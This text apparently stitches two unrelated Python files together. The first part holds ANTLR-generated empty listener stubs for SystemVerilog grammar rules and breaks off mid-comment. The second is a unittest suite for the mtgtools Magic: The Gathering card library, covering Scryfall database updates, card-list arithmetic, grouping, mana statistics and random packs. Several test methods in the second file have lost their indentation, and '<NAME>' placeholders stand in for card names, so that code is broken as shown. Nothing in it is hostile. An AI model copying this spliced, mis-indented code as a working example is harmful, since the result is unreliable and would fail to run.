    def exitLet_expression(self, ctx:SystemVerilogParser.Let_expressionContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_list_of_arguments.
    def enterLet_list_of_arguments(self, ctx:SystemVerilogParser.Let_list_of_argumentsContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_list_of_arguments.
    def exitLet_list_of_arguments(self, ctx:SystemVerilogParser.Let_list_of_argumentsContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_actual_arg.
    def enterLet_actual_arg(self, ctx:SystemVerilogParser.Let_actual_argContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_actual_arg.
    def exitLet_actual_arg(self, ctx:SystemVerilogParser.Let_actual_argContext):
        pass
    # NOTE: ANTLR-generated no-op listener stubs for SystemVerilog gate/switch
    # instantiation, terminal, gate-type, and module-instantiation grammar
    # rules; subclasses override these to act on the parse tree.
    # Enter a parse tree produced by SystemVerilogParser#gate_instantiation.
    def enterGate_instantiation(self, ctx:SystemVerilogParser.Gate_instantiationContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#gate_instantiation.
    def exitGate_instantiation(self, ctx:SystemVerilogParser.Gate_instantiationContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#cmos_switch_instance.
    def enterCmos_switch_instance(self, ctx:SystemVerilogParser.Cmos_switch_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#cmos_switch_instance.
    def exitCmos_switch_instance(self, ctx:SystemVerilogParser.Cmos_switch_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#enable_gate_instance.
    def enterEnable_gate_instance(self, ctx:SystemVerilogParser.Enable_gate_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#enable_gate_instance.
    def exitEnable_gate_instance(self, ctx:SystemVerilogParser.Enable_gate_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#mos_switch_instance.
    def enterMos_switch_instance(self, ctx:SystemVerilogParser.Mos_switch_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#mos_switch_instance.
    def exitMos_switch_instance(self, ctx:SystemVerilogParser.Mos_switch_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#n_input_gate_instance.
    def enterN_input_gate_instance(self, ctx:SystemVerilogParser.N_input_gate_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#n_input_gate_instance.
    def exitN_input_gate_instance(self, ctx:SystemVerilogParser.N_input_gate_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#n_output_gate_instance.
    def enterN_output_gate_instance(self, ctx:SystemVerilogParser.N_output_gate_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#n_output_gate_instance.
    def exitN_output_gate_instance(self, ctx:SystemVerilogParser.N_output_gate_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pass_switch_instance.
    def enterPass_switch_instance(self, ctx:SystemVerilogParser.Pass_switch_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pass_switch_instance.
    def exitPass_switch_instance(self, ctx:SystemVerilogParser.Pass_switch_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pass_enable_switch_instance.
    def enterPass_enable_switch_instance(self, ctx:SystemVerilogParser.Pass_enable_switch_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pass_enable_switch_instance.
    def exitPass_enable_switch_instance(self, ctx:SystemVerilogParser.Pass_enable_switch_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pull_gate_instance.
    def enterPull_gate_instance(self, ctx:SystemVerilogParser.Pull_gate_instanceContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pull_gate_instance.
    def exitPull_gate_instance(self, ctx:SystemVerilogParser.Pull_gate_instanceContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pulldown_strength.
    def enterPulldown_strength(self, ctx:SystemVerilogParser.Pulldown_strengthContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pulldown_strength.
    def exitPulldown_strength(self, ctx:SystemVerilogParser.Pulldown_strengthContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pullup_strength.
    def enterPullup_strength(self, ctx:SystemVerilogParser.Pullup_strengthContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pullup_strength.
    def exitPullup_strength(self, ctx:SystemVerilogParser.Pullup_strengthContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#enable_terminal.
    def enterEnable_terminal(self, ctx:SystemVerilogParser.Enable_terminalContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#enable_terminal.
    def exitEnable_terminal(self, ctx:SystemVerilogParser.Enable_terminalContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#inout_terminal.
    def enterInout_terminal(self, ctx:SystemVerilogParser.Inout_terminalContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#inout_terminal.
    def exitInout_terminal(self, ctx:SystemVerilogParser.Inout_terminalContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#input_terminal.
    def enterInput_terminal(self, ctx:SystemVerilogParser.Input_terminalContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#input_terminal.
    def exitInput_terminal(self, ctx:SystemVerilogParser.Input_terminalContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#ncontrol_terminal.
    def enterNcontrol_terminal(self, ctx:SystemVerilogParser.Ncontrol_terminalContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#ncontrol_terminal.
    def exitNcontrol_terminal(self, ctx:SystemVerilogParser.Ncontrol_terminalContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#output_terminal.
    def enterOutput_terminal(self, ctx:SystemVerilogParser.Output_terminalContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#output_terminal.
    def exitOutput_terminal(self, ctx:SystemVerilogParser.Output_terminalContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pcontrol_terminal.
    def enterPcontrol_terminal(self, ctx:SystemVerilogParser.Pcontrol_terminalContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pcontrol_terminal.
    def exitPcontrol_terminal(self, ctx:SystemVerilogParser.Pcontrol_terminalContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#cmos_switchtype.
    def enterCmos_switchtype(self, ctx:SystemVerilogParser.Cmos_switchtypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#cmos_switchtype.
    def exitCmos_switchtype(self, ctx:SystemVerilogParser.Cmos_switchtypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#enable_gatetype.
    def enterEnable_gatetype(self, ctx:SystemVerilogParser.Enable_gatetypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#enable_gatetype.
    def exitEnable_gatetype(self, ctx:SystemVerilogParser.Enable_gatetypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#mos_switchtype.
    def enterMos_switchtype(self, ctx:SystemVerilogParser.Mos_switchtypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#mos_switchtype.
    def exitMos_switchtype(self, ctx:SystemVerilogParser.Mos_switchtypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#n_input_gatetype.
    def enterN_input_gatetype(self, ctx:SystemVerilogParser.N_input_gatetypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#n_input_gatetype.
    def exitN_input_gatetype(self, ctx:SystemVerilogParser.N_input_gatetypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#n_output_gatetype.
    def enterN_output_gatetype(self, ctx:SystemVerilogParser.N_output_gatetypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#n_output_gatetype.
    def exitN_output_gatetype(self, ctx:SystemVerilogParser.N_output_gatetypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pass_en_switchtype.
    def enterPass_en_switchtype(self, ctx:SystemVerilogParser.Pass_en_switchtypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pass_en_switchtype.
    def exitPass_en_switchtype(self, ctx:SystemVerilogParser.Pass_en_switchtypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#pass_switchtype.
    def enterPass_switchtype(self, ctx:SystemVerilogParser.Pass_switchtypeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#pass_switchtype.
    def exitPass_switchtype(self, ctx:SystemVerilogParser.Pass_switchtypeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#module_instantiation.
    def enterModule_instantiation(self, ctx:SystemVerilogParser.Module_instantiationContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#module_instantiation.
    def exitModule_instantiation(self, ctx:SystemVerilogParser.Module_instantiationContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#parameter_value_assignment.
    def enterParameter_value_assignment(self, ctx:SystemVerilogParser.Parameter_value_assignmentContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#parameter_value_assignment.
    def exitParameter_value_assignment(self, ctx:SystemVerilogParser.Parameter_value_assignmentContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#list_of_parameter_assignments.
    def enterList_of_parameter_assignments(self, ctx:SystemVerilogParser.List_of_parameter_assignmentsContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#list_of_parameter_assignments.
    def exitList_of_parameter_assignments(self, ctx:SystemVerilogParser.List_of_parameter_assignmentsContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#ordered_parameter_assignment.
    def enterOrdered_parameter_assignment(self, ctx:SystemVerilogParser.Ordered_parameter_assignmentContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#ordered_parameter_assignment.
    def exitOrdered_parameter_assignment(self, ctx:SystemVerilogParser.Ordered_parameter_assignmentContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#named_parameter_assignment.
    def enterNamed_parameter_assignment(self, ctx:SystemVerilogParser.Named_parameter_assignmentContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#named_parameter_assignment.
    def exitNamed_parameter_assignment(self, ctx:SystemVerilogParser.Named_parameter_assignmentContext):
        pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_instance.
| |
# <gh_stars>10-100
import unittest
import warnings
from mtgtools import MtgDB
from mtgtools.PCardList import PCardList
from mtgtools.PSetList import PSetList

# Shared module-level fixtures: open (or create) the test database and pull
# the latest Scryfall bulk data once; every test case below reuses these.
tool = MtgDB.MtgDB("testdb.fs")
tool.scryfall_update()
cards = tool.root.scryfall_cards
sets = tool.root.scryfall_sets


def _playset(card_name):
    # Three copies of the first card whose name matches `card_name` exactly.
    return 3 * cards.where_exactly(name=card_name)[0:1]


basic_lands = (_playset('forest')
               + _playset('mountain')
               + _playset('island')
               + _playset('swamp')
               + _playset('plains'))
non_basic_lands = (_playset('bayou')
                   + _playset('Cascading Cataracts')
                   + _playset('Evolving Wilds')
                   + _playset('Mutavault'))
creatures = (_playset('wild mongrel')
             + _playset('Ogre Taskmaster')
             + _playset('Aquamoeba')
             + _playset('Midnight Banshee')
             + _playset('Trapjaw Tyrant')
             + _playset('Merfolk Mistbinder')
             + _playset('Storm Fleet Sprinter')
             + _playset('Jungle Creeper')
             + _playset('Belligerent Hatchling')
             + _playset('Crackleburr')
             + _playset('Akki Lavarunner // Tok-Tok, Volcano Born')
             + _playset("Homura, Human Ascendant // Homura's Essence")
             + _playset('Accursed Witch // Infectious Curse')
             + _playset('Civilized Scholar // Homicidal Brute')
             + _playset('Dryad Arbor')
             + _playset('Aegis of the Gods'))
non_creature_spells = (_playset('Back from the Brink')
                       + _playset('Blazing Torch')
                       + _playset('Fall of the Thran')
                       + _playset('Bonds of Faith')
                       + _playset('Brimstone Volley')
                       + _playset('Bump in the Night')
                       + _playset('Cellar Door')
                       + _playset('Curse of the Bloody Tome')
                       + _playset("Full Moon's Rise")
                       + _playset('Alive // Well')
                       + _playset('Appeal // Authority')
                       + _playset('Izzet Signet'))
planeswalkers = (_playset('Liliana of the Veil')
                 + _playset('Garruk Relentless // Garruk, the Veil-Cursed')
                 + _playset('<NAME>'))
tokens = (_playset('Angel')
          + _playset('Clue')
          + _playset('Energy Reserve')
          + _playset('Angel // Demon'))
other = (_playset('<NAME>')
         + _playset('Ashnod')
         + _playset('Agyrem')
         + _playset('All in Good Time'))
# NOTE(review): the '<NAME>' entries above look like anonymization
# placeholders left in the original source; the real card names need to be
# restored for these lookups to match anything.
testlist = (other + tokens + creatures + non_basic_lands
            + non_creature_spells + basic_lands + planeswalkers)
class TestPCardsListMethodsScryfall(unittest.TestCase):
    """Integration tests for PCardList behavior against a Scryfall-synced DB."""
    def test_integrity(self):
        # The shared module-level database must pass mtgtools' own Scryfall
        # integrity verification.
        tool.verify_scryfall_integrity()
def test_basic_update(self):
clean_db = MtgDB.MtgDB("clean_db.fs")
clean_db.scryfall_update()
clean_db.verify_scryfall_integrity()
clean_db.close()
def test_update_changed_sets(self):
clean_db = MtgDB.MtgDB("clean_db.fs")
c_set = clean_db.root.scryfall_sets[0]
c_cards = PCardList(c_set._cards)
c1_l = len(clean_db.root.scryfall_cards)
s1_l = len(clean_db.root.scryfall_sets)
c_set_code = c_set.code
c_set_name = c_set.name
c_set.code= 'xxxyyyy'
c_set.name = 'xxxyyyy'
self.assertTrue(c_set_code not in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue(c_set_name not in [pset.name for pset in clean_db.root.scryfall_sets])
self.assertTrue('xxxyyyy' in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue('xxxyyyy' in [pset.name for pset in clean_db.root.scryfall_sets])
clean_db.commit()
clean_db.scryfall_update()
self.assertTrue('xxxyyyy' not in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue('xxxyyyy' not in [pset.name for pset in clean_db.root.scryfall_sets])
self.assertTrue(c_set_code in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue(c_set_name in [pset.name for pset in clean_db.root.scryfall_sets])
self.assertEqual(c1_l, len(clean_db.root.scryfall_cards))
self.assertEqual(s1_l, len(clean_db.root.scryfall_sets))
self.assertTrue(clean_db.root.scryfall_sets.where_exactly(code=c_set_code)[0].has_all(c_cards))
self.assertEqual(len(clean_db.root.scryfall_sets.where_exactly(code=c_set_code)[0]), len(c_cards))
self.assertEqual(len(clean_db.root.scryfall_cards),
sum([len(pset.cards) for pset in clean_db.root.scryfall_sets]))
for pset in clean_db.root.scryfall_sets:
self.assertEqual(len(pset.cards), pset.card_count)
for card in pset.cards:
self.assertEqual(card.set, pset.code)
clean_db.verify_scryfall_integrity()
clean_db.close()
def test_update_changed_cards(self):
clean_db = MtgDB.MtgDB("clean_db.fs")
c1_l = len(clean_db.root.scryfall_cards)
s1_l = len(clean_db.root.scryfall_sets)
c1 = clean_db.root.scryfall_cards[10000]
old_name = c1.name
old_code = c1.set
c1.name = "xxxyyyy"
c1.set = "xxxyyyy"
clean_db.commit()
clean_db.scryfall_update()
self.assertEqual(c1_l, len(clean_db.root.scryfall_cards))
self.assertEqual(s1_l, len(clean_db.root.scryfall_sets))
self.assertNotEqual(c1.name, "xxxyyyy")
self.assertNotEqual(c1.set, "xxxyyyy")
self.assertEqual(c1.name, old_name)
self.assertEqual(c1.set, old_code)
self.assertEqual(len(clean_db.root.scryfall_cards),
sum([len(pset.cards) for pset in clean_db.root.scryfall_sets]))
for pset in clean_db.root.scryfall_sets:
self.assertEqual(len(pset.cards), pset.card_count)
for card in pset.cards:
self.assertEqual(card.set, pset.code)
clean_db.verify_scryfall_integrity()
clean_db.close()
    def test_basic(self):
        """Exercise PCardList arithmetic, membership, and copy semantics."""
        # Fixture sizes and +/-/* arithmetic on card lists.
        self.assertEqual(len(tokens + other), 24)
        self.assertEqual(len(planeswalkers + other), 21)
        self.assertEqual(len(basic_lands + non_basic_lands), 27)
        self.assertEqual(len(testlist), 144)
        self.assertEqual(len(basic_lands), 15)
        self.assertEqual(len(non_basic_lands), 12)
        self.assertEqual(len(creatures), 48)
        self.assertEqual(len(non_creature_spells), 36)
        self.assertEqual(len(planeswalkers), 9)
        self.assertEqual(len(tokens), 12)
        self.assertEqual(len(other), 12)
        self.assertEqual(len(testlist.basic_lands()), 15)
        self.assertEqual(len(testlist.creatures()), 54)
        self.assertEqual(len(testlist.lands()), 30)
        self.assertEqual(len(testlist.noncreatures()), 90)
        self.assertEqual(len(testlist.unique_cards()), 48)
        self.assertEqual(len(testlist.unique_names()), 48)
        self.assertEqual(len(testlist.normal_playable_cards()), 120)
        self.assertEqual(len(testlist - testlist.lands()), 114)
        self.assertEqual(len(testlist - testlist.creatures()), 90)
        self.assertEqual(len(testlist + testlist.lands()), 174)
        self.assertEqual(len(testlist + testlist.creatures()), 198)
        self.assertEqual(len(testlist * 2), 288)
        self.assertEqual(len(2 * testlist), 288)
        self.assertEqual(len(5 * testlist[0:1]), 5)
        self.assertTrue(testlist[0] in 3 * testlist[0:1])
        # has_all/has_any against each fixture sub-list.
        self.assertTrue(testlist.has_all(creatures))
        self.assertTrue(testlist.has_any(creatures))
        self.assertTrue(testlist.has_all(planeswalkers))
        self.assertTrue(testlist.has_any(planeswalkers))
        self.assertTrue(testlist.has_all(other))
        self.assertTrue(testlist.has_any(other))
        self.assertTrue(testlist.has_all(non_creature_spells))
        self.assertTrue(testlist.has_any(non_creature_spells))
        self.assertTrue(testlist.has_all(non_basic_lands))
        self.assertTrue(testlist.has_any(non_basic_lands))
        self.assertTrue(testlist.has_all(basic_lands))
        self.assertTrue(testlist.has_any(basic_lands))
        # has_all/has_any when a single card is appended via `list + card`.
        self.assertTrue(testlist.has_all(creatures + creatures[0]))
        self.assertTrue(testlist.has_any(creatures + creatures[0]))
        self.assertTrue(testlist.has_all(planeswalkers + creatures[0]))
        self.assertTrue(testlist.has_any(planeswalkers + creatures[0]))
        self.assertTrue(testlist.has_all(other + creatures[0]))
        self.assertTrue(testlist.has_any(other + creatures[0]))
        self.assertTrue(testlist.has_all(non_creature_spells + creatures[0]))
        self.assertTrue(testlist.has_any(non_creature_spells + creatures[0]))
        self.assertTrue(testlist.has_all(non_basic_lands + creatures[0]))
        self.assertTrue(testlist.has_any(non_basic_lands + creatures[0]))
        self.assertTrue(testlist.has_all(basic_lands + creatures[0]))
        self.assertTrue(testlist.has_any(basic_lands + creatures[0]))
        # Membership is per printing: a different printing of the same name
        # (index [1]) is not `in` a list built from printing [0].
        self.assertFalse(cards.where_exactly(name='forest')[1] in basic_lands)
        self.assertFalse(cards.where_exactly(name='bayou')[1] in non_basic_lands)
        self.assertFalse(cards.where_exactly(name='island')[0] in non_basic_lands)
        self.assertTrue(cards.where_exactly(name='forest')[0] in basic_lands)
        self.assertTrue(cards.where_exactly(name='bayou')[0] in non_basic_lands)
        self.assertTrue(cards.where_exactly(name='Dryad Arbor')[0] in creatures)
        # Constructing from a PCardList makes an independent copy.
        list1 = PCardList(creatures[0:3])
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        list1.append(creatures[7])
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 3)
        list2.append(creatures[7])
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 4)
        # Constructing from a plain Python list behaves the same way.
        list1 = PCardList([creatures[0], creatures[1], creatures[2]])
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        list1.append(creatures[7])
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 3)
        list2.append(creatures[7])
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 4)
        # `+=` with a single card does not alias the copy.
        list1 = PCardList(creatures[0:3])
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        list1 += creatures[7]
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 3)
        list2 += creatures[7]
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 4)
        # `+=` with another PCardList concatenates without aliasing.
        list1 = PCardList(creatures[0:3])
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        list1 += list2
        self.assertEqual(len(list1), 6)
        self.assertEqual(len(list2), 3)
        list2 += list1
        self.assertEqual(len(list1), 6)
        self.assertEqual(len(list2), 9)
        # Same semantics when list1 starts as a slice of the fixture.
        list1 = creatures[0:3]
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        list1 += list2
        self.assertEqual(len(list1), 6)
        self.assertEqual(len(list2), 3)
        list2 += list1
        self.assertEqual(len(list1), 6)
        self.assertEqual(len(list2), 9)
        # Mixing a plain Python list with a PCardList in + and +=.
        list1 = [creatures[0], creatures[1], creatures[2]]
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        self.assertEqual(len(list2 + list1), 6)
        self.assertEqual(len(list1 + list2), 6)
        self.assertEqual(len(list2 + list1[0]), 4)
        self.assertEqual(len(list1[0] + list2), 4)
        list2 += list1
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 6)
        list2 += list1[0]
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 7)
        # Building a list card-by-card from an empty PCardList.
        list1 = PCardList() + creatures[0] + creatures[1] + creatures[2]
        list2 = PCardList(list1)
        self.assertEqual(len(list1), 3)
        self.assertEqual(len(list2), 3)
        list1.append(creatures[7])
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 3)
        list2.append(creatures[7])
        self.assertEqual(len(list1), 4)
        self.assertEqual(len(list2), 4)
def test_filter_and_sort(self):
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.name)))
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.cmc)))
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.type_line)))
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.color_identity)))
self.assertEqual(creatures.where_exactly(name='Dryad Arbor')[0], creatures.sorted(lambda card: card.cmc)[0])
self.assertEqual(creatures.where_exactly(name="Homura, Human Ascendant // Homura's Essence")[0],
creatures.sorted(lambda card: card.cmc)[-1])
self.assertEqual(len(creatures) + 6, len(testlist.filtered(lambda card: 'Creature' in card.type_line)))
self.assertTrue(testlist.filtered(lambda card: 'Creature' in card.type_line).has_all(creatures))
    def test_groups(self):
        """grouped_by_* partitions must cover the list with no overlap errors."""
        # Partition by simple type: creatures / noncreatures / lands.
        tgst = testlist.grouped_by_simple_type()
        tgstcards = tgst['creatures'] + tgst['noncreatures'] + tgst['lands']
        self.assertEqual(len(tgstcards), len(testlist))
        self.assertTrue(tgstcards.has_all(testlist))
        self.assertTrue(tgst['creatures'].has_all(creatures))
        self.assertTrue(tgst['noncreatures'].has_all(non_creature_spells + planeswalkers + other))
        self.assertTrue(tgst['lands'].has_all(basic_lands + non_basic_lands))
        self.assertFalse(tgst['creatures'].has_any(non_creature_spells))
        self.assertFalse(tgst['creatures'].has_any(non_basic_lands))
        # Partition by converted mana cost; keys are integer cmc values.
        tgcmc = testlist.grouped_by_converted_mana_cost()
        tgcmccards = PCardList(list(card for sublist in tgcmc.values() for card in sublist))
        self.assertEqual(len(tgcmccards), len(testlist))
        self.assertTrue(tgcmccards.has_all(testlist))
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgcmc[0])
        self.assertTrue(testlist.where_exactly(name="Ashnod")[0] in tgcmc[0])
        self.assertTrue(testlist.where_exactly(name="Clue")[0] in tgcmc[0])
        self.assertTrue(testlist.where_exactly(name="Blazing Torch")[0] in tgcmc[1])
        self.assertTrue(testlist.where_exactly(name="Wild Mongrel")[0] in tgcmc[2])
        self.assertTrue(testlist.where_exactly(name="Appeal // Authority")[0] in tgcmc[3])
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgcmc[4])
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgcmc[5])
        # Partition by color identity; keys are color-letter strings ('' = colorless).
        tgci = testlist.grouped_by_color_identity()
        tgciards = PCardList(list(card for sublist in tgci.values() for card in sublist))
        self.assertEqual(len(tgciards), len(testlist))
        self.assertTrue(tgciards.has_all(testlist))
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgci[''])
        self.assertTrue(testlist.where_exactly(name="Ashnod")[0] in tgci[''])
        self.assertTrue(testlist.where_exactly(name="Clue")[0] in tgci[''])
        self.assertTrue(testlist.where_exactly(name="Blazing Torch")[0] in tgci[''])
        self.assertTrue(testlist.where_exactly(name="Wild Mongrel")[0] in tgci['G'])
        self.assertTrue(testlist.where_exactly(name="Appeal // Authority")[0] in tgci['GW'])
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgci['RW'])
        self.assertTrue(testlist.where_exactly(name="Angel")[0] in tgci['W'])
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgci['G'])
        self.assertTrue(testlist.where_exactly(name="Forest")[0] in tgci['G'])
        self.assertTrue(cards.where_exactly(name="Izzet Signet")[0] in tgci['RU'])
        # Partition by printed color; differs from color identity for lands
        # and artifacts (Forest / Izzet Signet land in '' here, not 'G'/'RU').
        tgc = testlist.grouped_by_color()
        tgcards = PCardList(list(card for sublist in tgc.values() for card in sublist))
        self.assertEqual(len(tgcards), len(testlist))
        self.assertTrue(tgcards.has_all(testlist))
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgc[''])
        self.assertTrue(testlist.where_exactly(name="Ashnod")[0] in tgc[''])
        self.assertTrue(testlist.where_exactly(name="Clue")[0] in tgc[''])
        self.assertTrue(testlist.where_exactly(name="Blazing Torch")[0] in tgc[''])
        self.assertTrue(testlist.where_exactly(name="Wild Mongrel")[0] in tgc['G'])
        self.assertTrue(testlist.where_exactly(name="Appeal // Authority")[0] in tgc['GW'])
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgc['RW'])
        self.assertTrue(testlist.where_exactly(name="Angel")[0] in tgc['W'])
        self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgc['G'])
        self.assertTrue(testlist.where_exactly(name="Forest")[0] in tgc[''])
        self.assertTrue(testlist.where_exactly(name="Izzet Signet")[0] in tgc[''])
        # Smoke-test the grouping calls on the full collection (results unused).
        cards.grouped_by_color()
        cards.grouped_by_color_identity()
        cards.grouped_by_converted_mana_cost()
        cards.grouped_by_simple_type()
        cards.mana_symbol_counts()
    def test_stats(self):
        """Aggregate mana-cost statistics over the fixture lists."""
        # Total converted mana cost; lands/tokens contribute 0.
        self.assertEqual(creatures.converted_mana_cost(), 159)
        self.assertEqual(basic_lands.converted_mana_cost(), 0)
        self.assertEqual(non_basic_lands.converted_mana_cost(), 0)
        self.assertEqual(tokens.converted_mana_cost(), 0)
        self.assertEqual(other.converted_mana_cost(), 0)
        self.assertEqual(testlist.where_exactly(name="Izzet Signet")[0:1].converted_mana_cost(), 2)
        # Average is total / number of cards.
        self.assertEqual(creatures.average_mana_cost(), 159 / 48)
        self.assertEqual(basic_lands.average_mana_cost(), 0)
        self.assertEqual(non_basic_lands.average_mana_cost(), 0)
        self.assertEqual(tokens.average_mana_cost(), 0)
        self.assertEqual(other.average_mana_cost(), 0)
        self.assertEqual(testlist.where_exactly(name="Izzet Signet")[0:2].average_mana_cost(), 2)
        # Per-color mana-symbol counts across whole lists.
        self.assertEqual(creatures.mana_symbol_counts()['G'], 9)
        self.assertEqual(creatures.mana_symbol_counts()['W'], 12)
        self.assertEqual(non_creature_spells.mana_symbol_counts()['W'], 12)
        lands = non_basic_lands + basic_lands
        self.assertEqual(lands.mana_symbol_counts()['G'], 0)
        self.assertEqual(lands.mana_symbol_counts()['U'], 0)
        self.assertEqual(lands.mana_symbol_counts()['W'], 0)
        self.assertEqual(lands.mana_symbol_counts()['B'], 0)
        self.assertEqual(lands.mana_symbol_counts()['R'], 0)
        self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['B'], 4)
        self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['U'], 0)
        self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['W'], 0)
        self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['R'], 0)
        self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['G'], 0)
        # Split/flip cards count symbols from both faces.
        self.assertEqual(creatures.where_exactly(name='Belligerent Hatchling')[0:2].mana_symbol_counts()['W'], 2)
        self.assertEqual(creatures.where_exactly(name='Belligerent Hatchling')[0:2].mana_symbol_counts()['R'], 2)
        self.assertEqual(creatures.where_exactly(name='Civilized Scholar // Homicidal Brute')[0:2].mana_symbol_counts()['U'], 2)
        self.assertEqual(non_creature_spells.where_exactly(name='Alive // Well')[0:2].mana_symbol_counts()['G'], 2)
        self.assertEqual(non_creature_spells.where_exactly(name='Alive // Well')[0:2].mana_symbol_counts()['W'], 2)
    def test_random(self):
        """random_card/random_sample/random_pack draw only from the list."""
        for _ in range(50):
            self.assertTrue(testlist.random_card() in testlist)
        for _ in range(50):
            self.assertTrue(testlist.has_all(testlist.random_sample(20, duplicates=True)))
        for _ in range(50):
            self.assertTrue(testlist.has_all(testlist.random_sample(20, duplicates=False)))
        for _ in range(50):
            self.assertTrue(testlist.has_all(testlist.random_pack()))
        init = testlist.random_pack()
        mythnum = 0
        rarenum = 0
        for _ in range(100):
            # Each generated pack: exactly 1 rare-or-mythic, 3 uncommons,
            # 11 commons (asserted below).
            random_pack = testlist.random_pack()
            rares = [card for card in random_pack if card.rarity == 'rare']
            uncs = [card for card in random_pack if card.rarity == 'uncommon']
            coms = [card for card in random_pack if card.rarity == 'common']
            myths = [card for card in random_pack if 'mythic' in card.rarity]
